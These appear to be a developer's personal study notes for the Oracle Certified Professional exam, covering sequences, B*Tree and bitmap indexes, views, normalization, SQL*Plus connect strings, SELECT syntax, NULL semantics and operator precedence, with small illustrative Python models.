<li><p>SEQUENCE .. A sequence is a structure for generating unique
integer values. Only one session at a time can read the next value and
thus force it to increment.</p></li>
<li><p>Each selection of SEQ1.NEXTVAL generates a unique
number.</p></li>
<li><p>Sequence Create Syntax</p></li>
</ol>
<div class="sourceCode" id="cb24"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb24-1"><a aria-hidden="true" href="#cb24-1" tabindex="-1"></a><span class="kw">CREATE</span> <span class="kw">SEQUENCE</span> [<span class="kw">schema</span>.]sequencename</span>
<span id="cb24-2"><a aria-hidden="true" href="#cb24-2" tabindex="-1"></a> [<span class="kw">INCREMENT</span> <span class="kw">BY</span> <span class="dt">number</span>] <span class="op">-></span> Defaults <span class="kw">to</span> <span class="op">+</span><span class="dv">1</span> but can be <span class="kw">any</span> positive <span class="dt">number</span> (<span class="kw">or</span> negative <span class="dt">number</span> <span class="cf">for</span> a descending <span class="kw">sequence</span>).</span>
<span id="cb24-3"><a aria-hidden="true" href="#cb24-3" tabindex="-1"></a> [<span class="kw">START</span> <span class="kw">WITH</span> <span class="dt">number</span>] <span class="op">-></span> Defaults <span class="kw">to</span> <span class="dv">1</span> but can be anything.</span>
<span id="cb24-4"><a aria-hidden="true" href="#cb24-4" tabindex="-1"></a> [<span class="kw">MAXVALUE</span> <span class="dt">number</span> | <span class="kw">NOMAXVALUE</span>]</span>
<span id="cb24-5"><a aria-hidden="true" href="#cb24-5" tabindex="-1"></a> <span class="op">-></span> <span class="kw">The</span> highest <span class="dt">number</span> an ascending <span class="kw">sequence</span> can go <span class="kw">to</span> <span class="kw">before</span> generating an error <span class="kw">or</span> <span class="kw">returning</span> <span class="kw">to</span> its <span class="kw">START</span> <span class="kw">WITH</span> <span class="fu">value</span>.</span>
<span id="cb24-6"><a aria-hidden="true" href="#cb24-6" tabindex="-1"></a> <span class="kw">The</span> <span class="kw">default</span> <span class="kw">is</span> <span class="kw">no</span> maximum.</span>
<span id="cb24-7"><a aria-hidden="true" href="#cb24-7" tabindex="-1"></a> [<span class="kw">MINVALUE</span> <span class="dt">number</span> | <span class="kw">NOMINVALUE</span>]</span>
<span id="cb24-8"><a aria-hidden="true" href="#cb24-8" tabindex="-1"></a> <span class="op">-></span> <span class="kw">The</span> lowest <span class="dt">number</span> a descending <span class="kw">sequence</span> can go <span class="kw">to</span> <span class="kw">before</span> generating an error <span class="kw">or</span> <span class="kw">returning</span> <span class="kw">to</span> its <span class="kw">START</span> <span class="kw">WITH</span> <span class="fu">value</span>.</span>
<span id="cb24-9"><a aria-hidden="true" href="#cb24-9" tabindex="-1"></a> <span class="kw">The</span> <span class="kw">default</span> <span class="kw">is</span> <span class="kw">no</span> <span class="kw">minimum</span>.</span>
<span id="cb24-10"><a aria-hidden="true" href="#cb24-10" tabindex="-1"></a> [<span class="kw">CYCLE</span> | <span class="kw">NOCYCLE</span>]</span>
<span id="cb24-11"><a aria-hidden="true" href="#cb24-11" tabindex="-1"></a> <span class="op">-></span> Controls <span class="kw">the</span> behavior <span class="kw">on</span> reaching <span class="kw">MAXVALUE</span> <span class="kw">or</span> <span class="kw">MINVALUE</span>. <span class="kw">The</span> <span class="kw">default</span> behavior <span class="kw">is</span> <span class="kw">to</span> give an error</span>
<span id="cb24-12"><a aria-hidden="true" href="#cb24-12" tabindex="-1"></a> <span class="cf">If</span> <span class="kw">CYCLE</span> <span class="kw">is</span> specified <span class="kw">the</span> <span class="kw">sequence</span> will <span class="kw">return</span> <span class="kw">to</span> its starting point <span class="kw">and</span> repeat.</span>
<span id="cb24-13"><a aria-hidden="true" href="#cb24-13" tabindex="-1"></a> [<span class="kw">CACHE</span> <span class="dt">number</span> | <span class="kw">NOCACHE</span>]</span>
<span id="cb24-14"><a aria-hidden="true" href="#cb24-14" tabindex="-1"></a> <span class="op">-></span> Oracle can preissue <span class="kw">sequence</span> <span class="kw">values</span> <span class="kw">in</span> batches <span class="kw">and</span> <span class="kw">cache</span> them <span class="cf">for</span> issuing <span class="kw">to</span> users.</span>
<span id="cb24-15"><a aria-hidden="true" href="#cb24-15" tabindex="-1"></a> <span class="kw">The</span> <span class="kw">default</span> <span class="kw">is</span> <span class="kw">to</span> generate <span class="kw">and</span> <span class="kw">cache</span> <span class="kw">the</span> <span class="kw">next</span> <span class="dv">20</span> <span class="kw">values</span>.</span>
<span id="cb24-16"><a aria-hidden="true" href="#cb24-16" tabindex="-1"></a> [<span class="kw">ORDER</span> | <span class="kw">NOORDER</span>] ;</span>
<span id="cb24-17"><a aria-hidden="true" href="#cb24-17" tabindex="-1"></a> <span class="op">-></span> <span class="kw">Only</span> relevant <span class="cf">for</span> a clustered <span class="kw">database</span>:</span>
<span id="cb24-18"><a aria-hidden="true" href="#cb24-18" tabindex="-1"></a> <span class="kw">ORDER</span> forces <span class="kw">all</span> <span class="kw">instances</span> <span class="kw">in</span> <span class="kw">the</span> <span class="kw">cluster</span> <span class="kw">to</span> coordinate incrementing <span class="kw">the</span> <span class="kw">sequence</span>,</span>
<span id="cb24-19"><a aria-hidden="true" href="#cb24-19" tabindex="-1"></a> so that numbers issued are always <span class="kw">in</span> <span class="kw">order</span> even <span class="cf">when</span> issued <span class="kw">to</span> sessions against different <span class="kw">instances</span>.</span>
<span id="cb24-20"><a aria-hidden="true" href="#cb24-20" tabindex="-1"></a> <span class="kw">NOORDER</span> <span class="kw">is</span> <span class="kw">the</span> <span class="kw">default</span></span></code></pre></div>
<ol start="26" type="1">
<li>If your application selects from the sequence 10 times a second,
then set the cache value to 50 thousand.</li>
<li>NEXTVAL -> forces the sequence to increment and returns the new value</li>
<li>CURRVAL -> returns the last (or “current”) value issued to that session
through the CURRVAL pseudo column</li>
<li>The CURRVAL will be constant for one session until it selects
NEXTVAL again.</li>
<li>You can always obtain the next value by incrementing it with
NEXTVAL, and you can always recall the last value issued to YOUR session
with CURRVAL, but you CANNOT find the last value issued across all sessions.</li>
<li>The CURRVAL of a sequence is the last value issued to the current
session, not necessarily the last value issued. .. You cannot select the
CURRVAL until after selecting the NEXTVAL.</li>
<li>A COMMIT is not necessary to make the increment of a sequence
permanent: .. It is permanent and made visible to the rest of the world
the moment it happens. .. Even if the insert or update is rolled back,
the sequence increment is NOT rolled back</li>
<li>The gaps will be larger if the database has been restarted and the
CACHE clause was used. .. All numbers that have been generated and
cached but not yet issued will be lost when the database is shut down ..
At the next restart, the current value of the sequence will be the last
number generated, not the last issued.</li>
<li>Altering a sequence</li>
</ol>
<div class="sourceCode" id="cb25"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb25-1"><a aria-hidden="true" href="#cb25-1" tabindex="-1"></a><span class="kw">ALTER</span> <span class="kw">SEQUENCE</span> sequencename</span>
<span id="cb25-2"><a aria-hidden="true" href="#cb25-2" tabindex="-1"></a>[<span class="kw">INCREMENT</span> <span class="kw">BY</span> <span class="dt">number</span>]</span>
<span id="cb25-3"><a aria-hidden="true" href="#cb25-3" tabindex="-1"></a>[<span class="kw">MAXVALUE</span> <span class="dt">number</span> | <span class="kw">NOMAXVALUE</span>]</span>
<span id="cb25-4"><a aria-hidden="true" href="#cb25-4" tabindex="-1"></a>[<span class="kw">MINVALUE</span> <span class="dt">number</span> | <span class="kw">NOMINVALUE</span>]</span>
<span id="cb25-5"><a aria-hidden="true" href="#cb25-5" tabindex="-1"></a>[<span class="kw">CYCLE</span> | <span class="kw">NOCYCLE</span>]</span>
<span id="cb25-6"><a aria-hidden="true" href="#cb25-6" tabindex="-1"></a>[<span class="kw">CACHE</span> <span class="dt">number</span> | <span class="kw">NOCACHE</span>]</span>
<span id="cb25-7"><a aria-hidden="true" href="#cb25-7" tabindex="-1"></a>[<span class="kw">ORDER</span> | <span class="kw">NOORDER</span>] ;</span></code></pre></div>
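<p>The NEXTVAL, CURRVAL and CACHE notes above can be pictured with a small Python model. This is only a sketch: the class <code>Sequence</code>, its method names and the session labels are made up for illustration, and it imitates the behaviour described in the notes rather than the way Oracle implements sequences.</p>

```python
class Sequence:
    """Toy model of a cached sequence (hypothetical, not Oracle code)."""

    def __init__(self, start=1, increment=1, cache=20):
        self.increment = increment
        self.cache = cache
        self.next_to_issue = start   # next value to hand out from the cache
        self.high_water = start      # first value that has not been generated yet
        self.currval = {}            # last value issued, tracked per session

    def nextval(self, session):
        if self.next_to_issue == self.high_water:
            # Cache exhausted: generate the next batch of values.
            self.high_water += self.cache * self.increment
        value = self.next_to_issue
        self.next_to_issue += self.increment
        self.currval[session] = value
        return value

    def curr(self, session):
        # CURRVAL is only defined after the session has selected NEXTVAL.
        if session not in self.currval:
            raise LookupError("CURRVAL is not yet defined in this session")
        return self.currval[session]

    def restart_database(self):
        # Generated but unissued values are lost, and all sessions end.
        self.next_to_issue = self.high_water
        self.currval.clear()


seq = Sequence(start=1, cache=20)
first = seq.nextval("session_a")          # session_a is issued 1
second = seq.nextval("session_b")         # session_b is issued 2
still_first = seq.curr("session_a")       # session_a still sees its own last value
seq.restart_database()
after_restart = seq.nextval("session_a")  # values 3..20 were cached and are skipped
```

<p>In this model the gap after the restart is exactly the unissued part of the cache, which is why a larger CACHE value produces larger gaps.</p>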
<ol start="35" type="1">
<li><p>ALTER command is the same as the CREATE command, with one
exception: there is no way to set the starting value. .. If you want to
restart the sequence, the only way is to drop it and re-create
it.</p></li>
<li><p>A unique constraint also requires an index. The difference from a
primary key constraint is that the column(s) of the unique constraint
can be left null, perhaps in many rows. .. This does not affect the
creation and use of the index: nulls do not go into the B*Tree
indexes</p></li>
<li><p>Foreign key constraints are enforced by indexes, but the index
must exist on the parent table</p></li>
<li><p>You should always create indexes on the foreign key columns
within the child table for performance reasons: a DELETE on the parent
table will be much faster if Oracle can use an index to determine
whether there are any rows in the child table referencing the row that
is being deleted</p></li>
<li><p>If there is no index on the column(s) referenced in the WHERE
clause, the only way to do this is with a full table scan.</p></li>
<li><p>A SELECT statement that includes the ORDER BY, GROUP BY, or UNION
keywords (and a few others) must sort the rows into order - unless there
is an index, which can return the rows in the correct order without
needing to sort them first.</p></li>
<li><p>Use of Indexes</p>
<p>-> For Primary keys and Foreign keys -> For Sorting during the
usage of ORDER BY or GROUP BY or UNION -> When tables are
joined</p></li>
<li><p>Table Joins -> depending on the size of the tables and the
memory resources available, it may be quicker to scan tables into memory
and join them there, rather than use indexes -> decision by
Oracle</p></li>
<li><p>The nested loop join technique passes through one table using an
index on the other table to locate the matching rows: this is usually a
disk-intensive operation .. A hash join technique reads the entire table
into memory, converts it into a hash table, and uses a hashing algorithm
to locate matching rows; this is more memory and CPU intensive .. A sort
merge join sorts the tables on the join column then merges them
together: this is often a compromise between disk, memory, and CPU
resources</p></li>
<li><p>Types of indexes -> B*Tree index, which is the default index
type, and the Bitmap Index</p></li>
<li><p>B*Tree indexes: these can be either unique or nonunique. ->
Nonunique is the default. -> “B” stands for “balanced” .. A unique
index will not permit insertion of two rows with the same key values; ..
a nonunique index will permit as many rows as you want with the same
values.</p></li>
<li><p>Indexes will improve performance for data retrieval but reduce
performance for DML operations.</p></li>
<li><p>B*tree Index .. The root node of the tree points to many nodes at
the second level, which can point to many nodes at the third level, and
so on .. The necessary depth of the tree will be largely determined by
the number of rows in the table and the length of the index key
values.</p></li>
<li><p>The B*Tree structure is very efficient. If the depth is greater
than three or four, then either the index keys are very long or the
table has billions of rows. .. If neither of these is the case, then the
index is in need of a rebuild.</p></li>
<li><p>The leaf nodes of the index tree store the rows’ keys, in order,
each with a pointer that identifies the physical location of the
row</p></li>
<li><p>The pointer to the row is the rowid -> Oracle proprietary
pseudocolumn that every row in every table has .. Encoded within it is
the physical address of the row.</p></li>
<li><p>ROWID: A row’s rowid is globally unique. Every row in every table
in the whole database will have a different rowid. .. The rowid
encoding gives the physical address of the row: from it, Oracle can
calculate which operating system file and where in the file the row is,
and go straight to it.</p></li>
<li><p>B*Tree indexes are very efficient if the number of rows needed is
low in proportion to the total number of rows in the table and if the
table is large</p></li>
<li><p>It is often said that if the query is going to retrieve more than 2 to
4 percent of the rows, then a full table scan will be quicker. .. A
major exception to this is if the value specified in the WHERE clause is
NULL. NULLs do not go into B*Tree indexes ..
<code>select * from employees where last_name is null;</code> -> ALWAYS A FULL TABLE
SCAN</p></li>
<li><p>B*Tree index should not be used: .. On a column with few unique
values, as it will not be selective: .. The proportion of the table that
will be retrieved for each distinct key value will be too high</p></li>
<li><p>B*Tree indexes should be used if: .. The cardinality (the number
of distinct values) in the column is high, and .. The number of rows in
the table is high, and .. The column is used in WHERE clauses or JOIN
conditions</p></li>
<li><p>A Bitmap Index stores the rowids associated with each key value
as a bitmap .. WALKIN 11010111000101011101011101….. .. DELIVERY
00101000111010100010100010….. .. This means that the first row has the
column value WALKIN, the second row WALKIN, the third DELIVERY .. So
every distinct value has its own bitmap; this includes NULLs, which
get a separate bitmap</p></li>
<li><p><code>select count(*) from sales where channel='WALKIN' and shop='OXFORD';</code>
.. Oracle can retrieve the two relevant bitmaps and add them together
with a Boolean AND operation: .. The result of the AND operation shows
that only the seventh and sixteenth rows qualify for selection</p></li>
<li><p>A particular advantage that bitmap indexes have over B*Tree
indexes is that they include NULLs. As far as the bitmap index is
concerned, NULL is just another distinct value, which will have its own
bitmap.</p></li>
<li><p>Bitmap indexes should be used if: .. The cardinality (the number
of distinct values) in the column is low (such as male/female), and ..
The number of rows in the table is high, and .. The column is used in
Boolean algebra (AND/OR/NOT) operations</p></li>
<li><p><code>CREATE [UNIQUE | BITMAP] INDEX [ schema.]indexname ON [schema.]tablename (column [, column...] );</code>
.. The default type of index is a nonunique B*Tree index.</p></li>
<li><p>It is not possible to create a unique bitmap index</p></li>
<li><p>Indexes are schema objects, and it is possible to create an index
in one schema on a table in another</p></li>
<li><p>A composite index is an index on several columns .. Composite
indexes can be on columns of different data types, and the columns do
not have to be adjacent in the table.</p></li>
<li><p><code>create unique index dept_i1 on dept(deptno);</code> .. It
will not be possible to insert duplicate values</p></li>
<li><p><code>create index emp_i2 on emp(surname,forename);</code> ..
will accept duplicate values</p></li>
<li><p><code>create bitmap index emp_i3 on emp(deptno);</code> .. Bitmap
index</p></li>
<li><p>A unique or primary key constraint can be enforced by indexes
that are either unique or nonunique: .. When a primary key is enforced by
a nonunique index, it will
be a nonunique index that happens to have only unique values.</p></li>
<li><p>The Oracle server should make the best decision about index use,
but if it gets it wrong it is possible for a programmer to embed
instructions, known as OPTIMIZER HINTS, in code that will force the use
(or not) of certain indexes.</p></li>
<li><p>The ALTER INDEX command lies in the database administration
domain and would typically be used to adjust the physical properties of
the index, not the logical properties that are of interest to
developers</p></li>
<li><p>When a table is dropped, all the indexes and constraints defined
for the table are dropped as well. .. If an index was created implicitly
by creating a constraint, then dropping the constraint will also drop
the index. .. If the index had been created explicitly and the
constraint created later, then if the constraint is dropped the index
will survive.</p></li>
<li><p>Bitmap indexes cannot be unique. The keywords BITMAP and UNIQUE
are mutually exclusive .. A bitmap index can be composite, with columns
of different data types.</p></li>
<li><p>There is no such thing as precompilation of views. Querying a
view takes the same time as running its defining query, whatever types of joins it uses</p></li>
<li><p><code>create view dept_v as select * from dept;</code></p></li>
<li><p><code>create synonym dept_s for dept_v;</code></p></li>
<li><p>Table -> View -> synonym .. If the table is dropped, querying
the synonym or the view triggers recompilation of the view, and an
error is thrown</p></li>
<li><p>We can never know in advance what the NEXTVAL of a sequence will be, as
multiple sessions can be using it</p></li>
<li><p>A UNIQUE constraint on a column requires an index. -> If a
UNIQUE or NONUNIQUE index already exists on the column, it will be
used.</p></li>
</ol>
<h1>Studying for OCP - Oracle Certified Professional - Part 1</h1>
<p>Senthilkumar Gopal, 2009-02-12</p>
<p>I am studying for the Oracle Certified Professional certification and
following are notes which are specific to the certification, from the
prep book. These notes are also helpful for a refresher on SQL syntax
and usability.</p>
<h3 id="chapter-1">Chapter 1</h3>
<ol type="1">
<li>The client tier consists of two components: the users and the user
processes. The server tier has three components: the server processes
that execute the SQL, the instance, and the database itself.</li>
<li>User Processes - SQL*Plus and SQL Developer</li>
<li>Oracle Net - Proprietary client server software used by Oracle DB
for communication</li>
<li>Table: also called a relation or an entity.</li>
<li>Rows: also called records or tuples; columns: also called
attributes or fields.</li>
<li>Number of rows: the cardinality of the relation.</li>
<li>Hierarchical paradigm => Storing employees of each department
separately</li>
</ol>
<ul>
<li>Rows are delimited by comma</li>
<li>Data retrieval is faster, but updating is difficult</li>
</ul>
<ol start="8" type="1">
<li>The relational paradigm is useful for both OLTP and DSS</li>
<li>Normalization - BOOKS Table - ISBN, Title, Author,
Publisher&Address</li>
</ol>
<ul>
<li>The first normal form is to remove the repeating groups - Make one
primary key per table</li>
<li>1st normal form - BOOKS - ISBN, Title, Publisher&Address AUTHORS
- Name, ISBN</li>
<li>The second normal form removes columns from the table that are not
dependent on the primary key</li>
<li>2nd Normal form - BOOKS - ISBN, Title, Publisher, AUTHORS - -do- ,
PUBLISHER - PUBLISHER,street, city, state</li>
<li>Third normal form removes all columns that are interdependent</li>
<li>3rd Normal form - PUBLISHERS - PUBLISHER, Address Code ADDRESSES -
Address Code, Street, City, State</li>
</ul>
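<p>The three normalization steps above can be walked through on a tiny data set. The sketch below is in Python rather than SQL, and every value in it (ISBNs, titles, names, addresses) is invented for illustration; only the table layout follows the notes.</p>

```python
# Unnormalized BOOKS rows: authors form a repeating group and the
# publisher is stored together with its address (sample data is made up).
raw_books = [
    {"isbn": "111", "title": "Book A", "authors": ["Ann", "Bob"],
     "publisher": "Pub X", "street": "1 Main St", "city": "Springfield", "state": "IL"},
    {"isbn": "222", "title": "Book B", "authors": ["Ann"],
     "publisher": "Pub X", "street": "1 Main St", "city": "Springfield", "state": "IL"},
]

books = []        # BOOKS(ISBN, Title, Publisher)
authors = []      # AUTHORS(Name, ISBN)
publishers = {}   # PUBLISHERS(Publisher -> Address Code)
addresses = {}    # ADDRESSES((Street, City, State) -> Address Code)

for row in raw_books:
    # 1st normal form: the repeating group becomes one AUTHORS row per author.
    authors.extend((name, row["isbn"]) for name in row["authors"])
    # 2nd normal form: publisher details do not depend on the ISBN, so they leave BOOKS.
    books.append((row["isbn"], row["title"], row["publisher"]))
    # 3rd normal form: street, city and state depend on each other, so they
    # move to ADDRESSES and are referenced through an address code.
    address = (row["street"], row["city"], row["state"])
    code = addresses.setdefault(address, len(addresses) + 1)
    publishers[row["publisher"]] = code
```

<p>After the loop the publisher and its address are each stored once, however many books refer to them.</p>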
<ol start="10" type="1">
<li><p>Every table should have a primary key defined. This is a
requirement of the relational paradigm. Note that the Oracle database
deviates from this standard: it is possible to define tables without a
primary key</p></li>
<li><p>Standards .. Primary key columns identified with a hash (#) ..
Foreign key columns identified with a back slash (\) .. Mandatory columns
(those that cannot be left empty) with an asterisk (*) .. Optional
columns with a lowercase <code>o</code></p></li>
<li><p>“crow’s feet” to indicate which sides of the relationship are the
many and the one.</p></li>
<li><p>SQL is managed by ISO and ANSI. .. ISO - Organisation
Internationale de Normalisation, based in Geneva .. ANSI - American
National Standards Institute, based in Washington, DC.</p></li>
<li><p>SQL Commands .. Data Manipulation Language (DML) commands:
SELECT, INSERT, UPDATE, DELETE, MERGE .. Data Definition Language (DDL)
commands: CREATE, ALTER, DROP, RENAME, TRUNCATE, COMMENT .. Data Control
Language (DCL) commands: GRANT, REVOKE .. Transaction Control Language
(TCL) commands: COMMIT, ROLLBACK, SAVEPOINT</p></li>
<li><p>SQL Tools .. SQL*Plus is a user process written in C. .. It
establishes a session against an instance and a database over the Oracle
Net protocol. .. The platforms for the client and the server can be
different /u01/app/oracle/product/db_1/bin/sqlplus - typical location ..
Env Variables required are: … The ORACLE_HOME - the set of files and
directories containing the executable code and some of the configuration
files. … PATH must include ORACLE_HOME/bin … LD_LIBRARY_PATH
ORACLE_HOME/lib. [but in practice you may get away without setting this]
… database username followed by a forward slash character as a
delimiter, then a password followed by an @ symbol as a delimiter, and
finally an Oracle Net connect identifier. … Ex: sqlplus
system/oracle@orcl … on Windows the executable file is sqlplus.exe, and the graphical
version was sqlplusw.exe … Windows: D:\11.1.0_2.exe … Logon String:
system/oracle@orcl … sqlplus /nolog - to prevent it from immediately
presenting a login prompt
HKEY_LOCAL_MACHINE/SOFTWARE/ORACLE/KEY_OraDb11g_home1 - Registry Key for
Env Variables</p>
<p>… sqlplus scott/tiger@orcl - resolves the connect identifier orcl using
tnsnames.ora or using LDAP [TNS - Transparent Network Substrate] …
sqlplus scott/tiger@linsrv1.bplc.co.za:1521/orcl.bplc.com - Complete
details of server IP and port and the database service to connect to. …
SQL Developer - JDK1.5 is the prerequisite</p></li>
<li><p>Definitions .. A database user is a person who can log on to the
database. .. A database schema is all the objects in the database owned
by one user. .. CREATE SCHEMA command does not create a schema, it is
used for creating objects in a schema. .. A schema is initially created
empty, when a user is created with the CREATE USER command.</p></li>
</ol>
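<p>The logon string format described under SQL Tools (username, forward slash, password, @ symbol, connect identifier) can be taken apart with a few lines of Python. This is a simplified sketch: <code>Logon</code> and <code>parse_logon</code> are hypothetical names, and quoting rules or passwords that contain the delimiter characters are not handled.</p>

```python
from typing import NamedTuple, Optional


class Logon(NamedTuple):
    username: str
    password: Optional[str]
    connect_identifier: Optional[str]


def parse_logon(logon: str) -> Logon:
    """Split 'user/password@connect_identifier' into its three parts."""
    # The connect identifier follows the last "@".
    credentials, at, identifier = logon.rpartition("@")
    if not at:
        credentials, identifier = logon, None
    # The password follows the first "/" of the credentials part.
    username, slash, password = credentials.partition("/")
    return Logon(username, password if slash else None, identifier)


alias_logon = parse_logon("system/oracle@orcl")
full_logon = parse_logon("scott/tiger@linsrv1.bplc.co.za:1521/orcl.bplc.com")
```

<p>The second call keeps the whole <code>host:port/service</code> text as the connect identifier, because only the part before the @ is split on the slash.</p>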
<ol start="17" type="1">
<li>Notes .. SQL, PL/SQL, and Java can all run in the database .. Third
normal form is the usual form aimed for by systems analysts when they
normalize data into relational structures. .. SQL Developer needs a
graphics terminal to display windows and JRE .. A schema and a user are
inseparable.</li>
</ol>
<h3 id="chapter-2">Chapter 2</h3>
<ol type="1">
<li>DESC[RIBE] &lt;schema&gt;.tablename</li>
<li>Every user has access to a special table called DUAL, which belongs to the SYS
schema</li>
<li>NUMBER(p,s) -> precision and scale -> max number of digits
given in precision</li>
<li>CHAR data type utilizes storage inefficiently, padding any unused
components with spaces.</li>
<li>TIMESTAMP data type - introduced in Oracle 9i</li>
<li>Three concepts from relational theory encompass the capability of
the SELECT statement: projection, selection, and joining .. Projection
refers to the restriction of attributes (columns) selected from a
relation or table .. Selection refers to the restriction of the tuples
or rows selected from a relation (table) .. Joining, as a relational
concept, refers to the interaction of tables with each other in a
query</li>
<li>SELECT *|{[DISTINCT] column|expression [alias],…} FROM table;</li>
<li>DISTINCT performs a distinct for the combination of columns. Ex:
select distinct job_id, department_id from job_history;</li>
<li>SQL*Plus always requires a statement terminator, and usually a
semicolon is used.</li>
<li>Individual statements in SQL scripts are commonly terminated by a
line break (or carriage return) and a forward slash on the next line,
instead of a semicolon.</li>
<li>SELECT TABLE_NAME from USER_TABLES</li>
<li>Hierarchy</li>
</ol>
<div class="sourceCode" id="cb1"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb1-1"><a aria-hidden="true" href="#cb1-1" tabindex="-1"></a> <span class="op">(</span> <span class="op">)</span> <span class="op">-</span> Brackets or parentheses</span>
<span id="cb1-2"><a aria-hidden="true" href="#cb1-2" tabindex="-1"></a> <span class="op">/</span> <span class="op">-</span> Division</span>
<span id="cb1-3"><a aria-hidden="true" href="#cb1-3" tabindex="-1"></a> <span class="op">*</span> <span class="op">-</span> Multiplication</span>
<span id="cb1-4"><a aria-hidden="true" href="#cb1-4" tabindex="-1"></a> <span class="op">-</span> <span class="op">-</span> Subtraction</span>
<span id="cb1-5"><a aria-hidden="true" href="#cb1-5" tabindex="-1"></a> <span class="op">+</span> <span class="op">-</span> Addition</span></code></pre></div>
<p>NOTE: Multiplication and division share one level of precedence, as do
addition and subtraction. If more than one operator with the same level of
precedence is present in an expression, then these will be evaluated
from left to right.</p>
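<p>A few worked expressions make the left-to-right rule concrete. They are written in Python, on the assumption that its precedence for these four operators and for parentheses matches the hierarchy listed above; the variable names are only labels.</p>

```python
# Same level, evaluated left to right: (12 / 3) * 2, not 12 / (3 * 2).
div_then_mul = 12 / 3 * 2

# Same level, evaluated left to right: (10 - 4) + 2, not 10 - (4 + 2).
sub_then_add = 10 - 4 + 2

# Multiplication is evaluated before addition unless parentheses say otherwise.
without_parentheses = 2 + 3 * 4
with_parentheses = (2 + 3) * 4
```

<p>Reading the first two expressions right to left would give 2 and 4 instead of 8, which is why the evaluation direction matters.</p>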
<h3 id="chapter-2-continued">Chapter 2 Continued</h3>
<ol start="13" type="1">
<li><p>select col1 [AS] &lt;alias&gt; -> For column aliasing we can use
AS or just a space -> using AS is a good SQL coding habit</p></li>
<li><p>Most Common Errors .. ORA-00923: FROM keyword not found where
expected .. ORA-00942: table or view does not exist</p></li>
<li><p>Case preservation of an alias is only possible if the alias is
double quoted and double quotes are needed if the alias is more than one
word</p></li>
<li><p>“ORA-00923: FROM keyword not found where expected” - multi word
alias is not double quoted</p></li>
<li><p>|| represents the character concatenation operator</p></li>
<li><p>select ‘literal’||‘processing using the REGIONS table’ from
regions;</p></li>
<li><p>A single quote inside a literal is written as two single quotes:
<code>'Plural''s'</code> gives Plural’s</p></li>
<li><p>Double quotes cannot be used to delimit a character literal</p></li>
<li><p>alternative quote (q) operator -> wrapping symbols ->
(round brackets), {curly braces}, [square brackets], or
&lt;angle brackets&gt;</p></li>
<li><p>Using the q operator, the character delimiter can effectively be
changed from a single quotation mark to any other character</p></li>
<li><p>Format -> <code>select q'X</code> -> <code>q'</code> is the notation and X is the
delimiter character. Ex: <code>select q'X'Test this String for Plural's X' "qX"
from dual;</code> where <code>'Test this String for Plural's X'</code> is the test
string</p></li>
<li><p>If we use one of the wrapping symbols, then <code>q'&lt;sdfgdfgd&gt;'</code>
can be given, where <code>&gt;</code> is taken as the closing delimiter</p></li>
<li><p>Any arithmetic calculation with a NULL value always returns NULL.
Even division by a NULL value results in NULL, unlike division by zero,
which results in an error</p></li>
<li><p>The character concatenation operators ignore null, whilst the
arithmetic operations involving null values always result in
null</p></li>
<li><p>All arithmetic operations with null will give null as the answer,
while concatenation will just ignore the null value and give the rest as
the answer</p></li>
</ol>
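<p>The contrast between arithmetic and concatenation with NULL can be modelled in Python, using <code>None</code> to stand in for NULL. The function names below are hypothetical, and the sketch only imitates the behaviour stated in the notes; it also assumes Oracle's treatment of an empty string as NULL.</p>

```python
def ora_add(a, b):
    """Arithmetic with a NULL operand yields NULL."""
    if a is None or b is None:
        return None
    return a + b


def ora_divide(a, b):
    """Division by NULL yields NULL; division by zero is an error."""
    if a is None or b is None:
        return None
    if b == 0:
        # Oracle reports ORA-01476: divisor is equal to zero.
        raise ZeroDivisionError("divisor is equal to zero")
    return a / b


def ora_concat(a, b):
    """The || operator ignores NULL operands."""
    result = (a or "") + (b or "")
    # Assumption: an empty result is treated as NULL.
    return result or None


salary_plus_bonus = ora_add(1000, None)   # NULL bonus makes the whole sum NULL
label = ora_concat("Total: ", None)       # the NULL is simply skipped
```

<p>This is why a NULL commission silently blanks out a computed total, while a NULL middle name does not blank out a concatenated full name.</p>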
<h3 id="chapter-3">CHAPTER 3</h3>
<ol type="1">
<li>SELECT *|{[DISTINCT] column|expression [alias],…} FROM table [WHERE
condition(s)];</li>
<li>where salary = 10000; where salary = ‘10000’; Both formats are
acceptable to Oracle since an implicit data type conversion is performed
when necessary.</li>
<li>String concatenations and arithmetic operations can also be used in
the WHERE clause</li>
<li>The literals are automatically converted into DATE values based on
the default date format, which is DD-MON-RR. [RR means that, while the
current year is between 2000 and 2049, 50-99 map to 1950-1999 and 00-49
map to 2000-2049]</li>
<li>DATE values are only equal to each other if there is an exact
match between all their components including day, month, year, hours,
minutes, and seconds.</li>
<li>The entire four-digit year component (YYYY) can be specified</li>
<li>START_DATE + 30 returns a DATE 30 days later than the
start_date</li>
<li>END_DATE - START_DATE gives a NUMBER (the difference in days)</li>
<li>Not Equal - != (or) <></li>
<li>Testing character inequality : the strings being compared on either
side of the inequality operator are converted to a numeric
representation of its character [same for < or >]</li>
<li>The Oracle server stores dates in an internal numeric format, and
these values are compared within the conditions.</li>
<li>BETWEEN is equivalent to &gt;= and &lt;= (both bounds are inclusive)</li>
<li>IN operator - equivalent to multiple ORs</li>
<li>wildcards - % [0 or more characters] and _ [1 character]</li>
<li>like ‘%’ - all rows with the values NOT NULL</li>
<li>% and _ can be escaped using an escape character such as \ [backslash],
written as <code>like 'a\%' ESCAPE '\'</code></li>
<li>The escape character can be changed as well</li>
<li>For Null checks always use IS NULL</li>
<li>FOR AND operator - If the row contains a NULL value that causes one
of the conditions to evaluate to NULL, then that row is excluded</li>
<li>SELECT * FROM EMPLOYEES WHERE SALARY LIKE ‘%80%’; - Oracle
temporarily changes the NUMBER to CHAR data for the comparison</li>
<li>Usage of NOT: where NOT (last_name=‘King’), where first_name NOT
LIKE ‘R%’,where department_id NOT IN (10,20,30),where salary NOT BETWEEN
1 and 3000,where commission_pct IS NOT NULL</li>
<li>WHERE A and B or C or D and E: a row will be returned if both
conditions A and B are fulfilled, or only condition C is met, or both
conditions D and E are fulfilled. Conditions
separated by AND both need to be satisfied, while OR needs only one of
them to be satisfied</li>
<li>Precedence</li>
</ol>
<div class="sourceCode" id="cb2"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb2-1"><a aria-hidden="true" href="#cb2-1" tabindex="-1"></a> [<span class="kw">NOT</span>] <span class="kw">LIKE</span>, <span class="kw">IS</span> [<span class="kw">NOT</span>] <span class="kw">NULL</span>, [<span class="kw">NOT</span>] <span class="kw">IN</span></span>
